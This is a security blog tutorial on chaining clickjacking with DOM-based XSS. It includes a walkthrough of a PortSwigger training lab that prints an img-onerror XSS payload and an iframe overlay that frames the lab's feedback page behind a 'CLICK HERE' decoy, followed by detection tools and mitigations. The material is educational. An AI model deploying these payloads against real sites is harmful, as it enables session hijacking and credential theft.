05 Mar, 2024

Clickjacking chained with DOM-Based XSS

Clickjacking and DOM-Based Cross-Site Scripting (XSS) are both web security vulnerabilities, and when combined, they can create a more sophisticated and dangerous attack scenario.


Description: Clickjacking, also known as UI redressing, involves tricking a user into clicking on something different from what the user perceives. This is often achieved by transparently overlaying an invisible frame or button over a seemingly legitimate clickable element.

Attack Scenario: An attacker may embed a target website within an iframe and overlay transparent elements, tricking the user into interacting with the visible elements while unknowingly interacting with the invisible elements of the target site.

DOM-Based XSS:

Description: DOM-Based XSS occurs when a web application’s client-side scripts manipulate the Document Object Model (DOM) in an insecure way, allowing an attacker to inject malicious scripts that can be executed in the context of the user’s browser.

Attack Scenario: An attacker exploits vulnerabilities in client-side scripts to inject and execute malicious code within the user’s browser.

Chaining Clickjacking with DOM-Based XSS:

Attack Description:

An attacker may create a page with an embedded iframe that contains the target website.

The attacker overlays transparent elements on the visible part of the iframe, tricking the user into interacting with these elements.

Simultaneously, the attacker exploits a DOM-Based XSS vulnerability on the target site within the iframe.

The injected script steals sensitive information or performs malicious actions on behalf of the user without their knowledge.

Example Scenario:

An attacker creates a fake login page for a popular social media site.

The attacker embeds the actual social media site within an iframe, making it invisible to the user.

Transparent buttons are placed over the login button of the social media site, tricking the user into unknowingly clicking the login button.

Simultaneously, a DOM-Based XSS payload is injected into the social media site, stealing the user’s login credentials.

Examples of exploitation

To better understand the Stored DOM XSS vulnerability, let’s take a look at one of the labs from PortSwigger, a well-known web security company. This lab demonstrates a Stored DOM XSS vulnerability in blog comment functionality. To solve this lab, exploit this vulnerability to call the alert() function.

As we can see we have 4 fields for entering information.

Insert this payload <img src=0 onerror=alert(1)> 

As we can see the vulnerability worked.

We should take this url to create clickjacking

					<iframe src="https://0a4f007403fca1a68013d0b3001400be.web-security-academy.net/feedback"></iframe>

As we can see the clickjacking worked. We going to do <style>

iframe {
width: 1000px;
height: 900px;
opacity: 0.1;
z-index: 2;
div {
top: 815px;
left: 50px;
z-index: 1;
<div>CLICK HERE</div>
<iframe src="https://0a4f007403fca1a68013d0b3001400be.web-security-academy.net/feedback?name=<img class="lazyload" src=1 onerror=print()>&email=a@a.com&subject=test&message=test"></iframe>

Thats how it looks now. When user press “CLICK HERE

As we can see the vulnerability worked.

Scanners that detect vulnerabilities

Burp Suite:

Description: A comprehensive web application security testing tool that includes features for scanning, crawling, and analyzing web applications.

OWASP ZAP (Zed Attack Proxy):

Description: An open-source security tool designed for finding vulnerabilities in web applications.


Description:web application security scanner that automates the detection of vulnerabilities, including XSS.


Description: A vulnerability scanner for web applications that includes features for finding XSS and other vulnerabilities.

Average CVSS score

Assigning a specific Common Vulnerability Scoring System (CVSS) score for “Clickjacking Chained with DOM-Based XSS” can be challenging, as the score depends on various factors such as the impact, exploitability, and mitigating factors specific to each vulnerability.

To study

Understand Clickjacking:

Definition: Research and understand what Clickjacking is and how it works.

Mitigations: Learn about frame-busting techniques, X-Frame-Options header, and other methods to prevent Clickjacking.

Understand DOM-Based XSS:

Definition: Explore what DOM-Based XSS is and how it differs from other forms of XSS.

Mitigations: Study techniques for input validation, output encoding, and the use of Content Security Policy (CSP) to prevent DOM-Based XSS.

Explore Chaining Vulnerabilities:

Definition: Learn the concept of chaining vulnerabilities and how combining Clickjacking with DOM-Based XSS increases the attack impact.

Real-World Examples: Look for documented cases or research papers that demonstrate or discuss the chaining of Clickjacking with DOM-Based XSS.

Hands-On Labs:

Setting Up a Lab Environment: Create a controlled environment using virtual machines or containers to practice and experiment safely.

Use Tools: Experiment with tools like Burp Suite, OWASP ZAP, or custom scripts to simulate and observe Clickjacking and DOM-Based XSS scenarios.

Web Application Testing:

Testing Tools: Familiarize yourself with web application testing tools that can help identify Clickjacking and XSS vulnerabilities.

OWASP WebGoat and DVWA: Practice on deliberately vulnerable applications like OWASP WebGoat or Damn Vulnerable Web Application (DVWA).

Learn Defensive Techniques:

Implementing Security Headers: Study how to implement security headers like X-Frame-Options and Content Security Policy (CSP) to mitigate these vulnerabilities.

Secure Coding Practices: Understand secure coding practices to prevent XSS and other client-side vulnerabilities.

Research and Articles:

Read Research Papers: Explore academic papers and articles related to Clickjacking, DOM-Based XSS, and their combinations.

Blogs and Tutorials: Follow blogs and tutorials from reputable sources that discuss real-world examples and mitigation strategies.

Conclusion and Mitigation

Clickjacking chained with DOM-Based XSS represents a sophisticated and dangerous attack scenario that leverages multiple vulnerabilities to compromise the security of web applications. Clickjacking involves deceiving users into interacting with unintended elements, while DOM-Based XSS allows attackers to inject and execute malicious scripts within the user’s browser. When these vulnerabilities are chained together, the potential impact on confidentiality, integrity, and availability is significant.

Mitigation Strategies:

Frame-Busting Techniques:

Implement frame-busting techniques to prevent your web application from being embedded within iframes on malicious sites.

X-Frame-Options Header:

Set the X-Frame-Options header to DENY or SAMEORIGIN to control whether your web pages can be embedded in iframes and mitigate the risk of clickjacking.

Content Security Policy (CSP):

Utilize Content Security Policy to define and enforce a set of rules that control the sources from which your web application can load resources, including scripts. This can help mitigate DOM-Based XSS.

Input Validation and Output Encoding:

Implement strict input validation to ensure that user input is sanitized and adheres to expected formats.

Apply output encoding to sanitize user inputs before displaying them in the browser, preventing the execution of malicious scripts.

Security Awareness Training:

Educate developers, administrators, and users about the risks associated with clickjacking and XSS attacks. Encourage best practices for secure coding and safe web browsing.

Regular Security Audits:

Conduct regular security audits, including both automated and manual testing, to identify and address vulnerabilities in your web application.


Implement a defense-in-depth strategy by employing multiple layers of security measures. This can include network-level controls, server-side controls, and client-side controls.

Update and Patching:

Keep all software components, including web servers, frameworks, and libraries, up to date with the latest security patches to address known vulnerabilities.

Monitoring and Incident Response:

Implement monitoring mechanisms to detect anomalous activities and potential attacks. Have an incident response plan in place to respond promptly to security incidents.

Collaborate with the Security Community:

Stay informed about emerging threats and vulnerabilities by actively participating in the security community. Share insights and collaborate to enhance overall security practices.

Other Services

Ready to secure?

Let's get in touch